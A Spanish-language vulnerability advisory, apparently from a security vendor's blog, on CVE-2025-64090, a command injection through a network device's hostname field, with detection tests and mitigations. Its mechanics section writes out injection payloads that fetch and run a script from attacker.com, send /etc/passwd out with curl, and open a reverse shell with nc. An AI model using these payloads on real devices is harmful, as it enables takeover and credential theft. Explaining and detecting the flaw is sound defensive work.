剣 KENSAI
CVE CRÍTICA 9 de enero de 2026 · 8 min de lectura

CVE-2025-64090: La inyección de comandos mediante el campo de nombre de host del dispositivo permite comprometer por completo el sistema

Los atacantes autenticados pueden ejecutar comandos arbitrarios del sistema operativo inyectando metacaracteres de shell en el campo de nombre de host del dispositivo. CVSS 10.0. Una clase de vulnerabilidad común en dispositivos de red y sistemas embebidos que suele generar un impacto crítico.


CVSS 10.0 — CRÍTICA
CampoDetalle
ID de CVECVE-2025-64090
GravedadCRÍTICA (CVSS 3.1: 10.0)
Tipo de vulnerabilidadInyección de comandos del sistema operativo (CWE-78)
Publicada9 de enero de 2026
Autenticación requeridaSí (privilegios bajos)
Vector de ataqueRed

¿Qué es CVE-2025-64090?

CVE-2025-64090 es una vulnerabilidad de inyección de comandos en la que el campo de configuración del nombre de host del dispositivo se pasa sin sanear a un comando de shell subyacente. Al insertar metacaracteres de shell (;, |, `, $()) en el valor del nombre de host, los atacantes autenticados pueden escapar del contexto previsto del comando y ejecutar comandos arbitrarios del sistema operativo con los privilegios del proceso de administración del dispositivo, normalmente root.

Esta clase de vulnerabilidad es endémica en dispositivos de red, hardware IoT, routers, firewalls y sistemas Linux embebidos cuyas interfaces de administración web construyen comandos de shell a partir de valores de configuración proporcionados por el usuario sin un saneamiento adecuado.

⚠ Poca dificultad para comprometer por completo el sistema

Cualquier usuario autenticado, incluidas las cuentas con privilegios bajos, puede conseguir la ejecución de comandos con privilegios de root. En entornos donde existen credenciales predeterminadas o débiles, esto se convierte en la práctica en una explotación sin autenticación.

Mecánica de la inyección de comandos

# El dispositivo vulnerable establece el nombre de host mediante un comando de shell:
# system("hostname " + user_input)

# El atacante envía el nombre de host:
newhost; wget http://attacker.com/malware.sh -O /tmp/m.sh; sh /tmp/m.sh

# Esto se ejecuta como:
hostname newhost; wget http://attacker.com/malware.sh -O /tmp/m.sh; sh /tmp/m.sh

# Otros patrones de inyección:
# Ejecución con comillas invertidas:
`curl http://attacker.com/$(cat /etc/passwd | base64)`

# Subshell:
$(id > /var/www/html/pwned.txt)

# Canalización:
validhost | nc attacker.com 4444 -e /bin/sh

Versiones afectadas

Consulte el aviso del proveedor para conocer los modelos de hardware y las versiones de firmware específicos. Los dispositivos de red con interfaces de administración web que permiten configurar el nombre de host constituyen la principal superficie de riesgo.

Métodos de detección

Pruebas de inyección en el nombre de host

# Prueba manual: enviar un nombre de host con una carga útil de inyección de comandos
# Usar un retardo temporal para confirmar una inyección ciega
POST /admin/network/hostname
hostname=test%3Bsleep%205

# Si la respuesta se retrasa unos 5 segundos: vulnerable

# Confirmación fuera de banda:
hostname=test%3Bnslookup+attacker.burpcollaborator.net

🔍 Detección de KENSAI: El escáner de seguridad de dispositivos de KENSAI comprueba si los campos de las interfaces de administración, incluidos los de configuración del nombre de host, DNS, NTP y SNMP, son vulnerables a la inyección de comandos del sistema operativo. Los patrones de CVE-2025-64090 están incluidos en los perfiles de evaluación de dispositivos de red.

Medidas de mitigación

  1. Aplique inmediatamente la actualización de firmware del proveedor.
  2. Validación de entradas: Los campos de nombre de host solo deben aceptar caracteres alfanuméricos y guiones, de conformidad con RFC 952/1123.
  3. Utilice API seguras: Sustituya la construcción de comandos de shell por llamadas al sistema que acepten matrices de argumentos, sin interpolación del shell.
  4. Restrinja la interfaz de administración: Limite mediante reglas de firewall el acceso a la interfaz de administración a rangos de IP de confianza.
  5. Cambie las credenciales predeterminadas: Asegúrese de que todas las cuentas de administración utilicen contraseñas seguras y únicas.
  6. Segmentación de la red: Aísle las interfaces de administración de las redes accesibles para los usuarios.

¿Hay inyección de comandos en sus dispositivos de red?

KENSAI analiza dispositivos de red e interfaces de administración en busca de vulnerabilidades de inyección de comandos, incluida CVE-2025-64090. Identifique los dispositivos vulnerables antes de que los atacantes logren afianzarse en su red.

Analizar dispositivos de red gratis

Publicado por el equipo de investigación de seguridad de KENSAI · Más análisis de CVE

Artículos relacionados

Francia informa de una reducción del ransomware gracias a NIS2 Vulnerabilidad por configuración incorrecta de CORS: guía completa de detección y prevención La ANSSI de Francia informa de una reducción del ransomware